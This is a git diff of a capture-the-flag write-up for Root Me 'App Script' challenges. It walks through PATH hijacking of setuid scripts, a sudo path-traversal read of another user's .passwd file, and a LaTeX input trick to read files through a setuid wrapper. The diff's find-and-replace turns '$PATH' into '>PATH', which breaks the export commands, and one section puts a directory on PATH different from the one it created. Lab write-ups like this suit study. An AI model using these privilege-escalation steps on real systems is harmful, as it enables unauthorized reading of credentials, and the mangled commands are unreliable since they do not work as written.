--- a/_posts/rootme/app-script/2022-01-25-very_easy.md
+++ b/_posts/rootme/app-script/2022-01-25-very_easy.md
@@ -1,7 +1,7 @@
 ---
 layout: post
 title: 'Root Me | App Script - Very Easy'
-date: 2022-02-27
+date: 2022-01-25
 permalink: /rootme/app-script/very-easy/
 ---
 
@@ -9,28 +9,28 @@ permalink: /rootme/app-script/very-easy/
 We need to copy cat into our folder, then change the name to "ls" and change the path to that folder.
 Now the script will read it as cat.
 {% highlight plain %}
-$ mkdir /tmp/zeropio
-$ cp /bin/cat /tmp/zeropio
-$ mv /tmp/zeropio/cat /tmp/zeropio/ls
-$ export PATH=/tmp/zeropio:$PATH
-$ ./ch11
+> mkdir /tmp/zeropio
+> cp /bin/cat /tmp/zeropio
+> mv /tmp/zeropio/cat /tmp/zeropio/ls
+> export PATH=/tmp/zeropio:>PATH
+> ./ch11
 {% endhighlight %}
 
 # [](#header-4)Sudo - weak configuration
 We need to see all the sudo options (with -l). Then we can see we need to use the cracked user, who can only do a cat to ./notes/ .
 {% highlight plain %}
-$ sudo -l
-$ sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/notes/../ch1cracked/.passwd
+> sudo -l
+> sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/notes/../ch1cracked/.passwd
 {% endhighlight %}
 
 # [](#header-4)Bash - System 2
 As we did in the first, we need to use nano instead of cat because the script have the options -al.
 {% highlight plain %}
-$ mkdir /tmp/zeropio
-$ cp /bin/nano /tmp/zeropio
-$ mv /tmp/zeropio/nano /tmp/zeropio/ls
-$ export PATH=/tmp/zeropio2:$PATH
-$ ./ch12
+> mkdir /tmp/zeropio
+> cp /bin/nano /tmp/zeropio
+> mv /tmp/zeropio/nano /tmp/zeropio/ls
+> export PATH=/tmp/zeropio2:>PATH
+> ./ch12
 {% endhighlight %}
 
 # [](#header-4)LaTex Input
@@ -44,12 +44,12 @@ We will create a **main.tex** file with the following content:
 \end{document}
 {% endhighlight %}
 
-We will generate a **main.pdf**file:
+We will generate a **main.pdf** file:
 {% highlight plain %}
-$ ./setuid-wrapper /tmp/main.tex
+> ./setuid-wrapper /tmp/main.tex
 {% endhighlight %}
 
  Then we will just get the pdf:
 {% highlight plain %}
- $ scp -P 2222 app-script-ch23@challenge02.root-me.org:/tmp/tmp.pIzF7UG6do/main.pdf .
+ > scp -P 2222 app-script-ch23@challenge02.root-me.org:/tmp/tmp.pIzF7UG6do/main.pdf .
  {% endhighlight %}
